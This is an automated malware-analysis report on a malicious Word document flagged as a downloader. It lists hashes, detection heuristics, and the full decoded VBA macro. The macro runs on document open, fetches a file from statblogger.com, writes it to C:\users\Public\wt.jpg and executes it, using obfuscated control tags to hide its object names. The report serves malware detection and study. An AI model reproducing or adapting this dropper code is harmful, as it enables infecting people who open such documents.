Office (OOXML) malware analysis — malicious · 3dad46932805fa9e

MALICIOUS

Office (OOXML)

138.6 KB Created: 2021-02-07 17:10:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-20

MD5: ea08f24809540b2ff3637a88df972b00 SHA-1: 0e3275cfa1bb76ac0cc3cd950a47a5b310955258 SHA-256: 3dad46932805fa9e3ce2b4bce3f8dc03e6be76f3e11e08a6e749ea2ba6afcc13

290 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.BlueWord-9845926-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.BlueWord-9845926-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
      f = ProcedureViewBuf.ResponseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
      Set ProcedureViewBuf = CreateObject(CounterVb)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2200 bytes
SHA-256: `126868c373a9de2b36e49ebb59d50be71a4f3c0e7a68f55250546fe02cf4fe7a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() InstrumentationUtil.CheckBox1_Click End Sub Attribute VB_Name = "InstrumentationUtil" Attribute VB_Base = "0{71292DFE-59E3-4509-8BE5-DAAECC1854F4}{5E76AC43-81AE-42E3-B42C-D93453855CA7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public ProcedureBufBuffer Public CopyLocal Public MainPointer Public Sub CheckBox1_Click() ListBox1.AddItem (CommandButton1.Tag) ListBox1.AddItem (CheckBox1.Tag) CommandButton1_Click ListBox1_Click End Sub Private Sub CommandButton1_Click() ListBox1.AddItem (Image1.ControlTipText) ListBox1.AddItem ("://statblogger.com/header.jpg") End Sub Private Sub ListBox1_Click() InstrumentationUtil.ProcedureBufBuffer = "C:\users\Public\" + "wt.jpg" InstrumentationUtil.CopyLocal = "http" InstrumentationUtil.MainPointer = "GET" SizeStructListbox = 1 Dim ProcedureViewBuf As Object Dim ProcStruct As Object For Each CounterVb In ListBox1.List If SizeStructListbox = Len("Z") Then Set ProcedureViewBuf = CreateObject(CounterVb) ProcedureViewBuf.Open InstrumentationUtil.MainPointer, InstrumentationUtil.CopyLocal & ListBox1.List(3), False ProcedureViewBuf.Send End If If SizeStructListbox = Len("ZZ") Then Set ProcStruct = CreateObject(CounterVb & "am") ProcStruct.Open ProcStruct.Type = Len("Z") f = ProcedureViewBuf.ResponseBody ProcStruct.Write f ProcStruct.SaveToFile InstrumentationUtil.ProcedureBufBuffer, 2 End If If SizeStructListbox = Len("ZZZ") Then Shell% (CounterVb + " " & InstrumentationUtil.ProcedureBufBuffer) End If SizeStructListbox = SizeStructListbox + 1 Next End Sub Private Sub skuid_Change() End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	96256 bytes
SHA-256: `c0e4946864773efc5dc2d3cb714ed093087304444499bc7135020e2cc3637f1f`
Detection ClamAV: Doc.Downloader.BlueWord-9845926-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.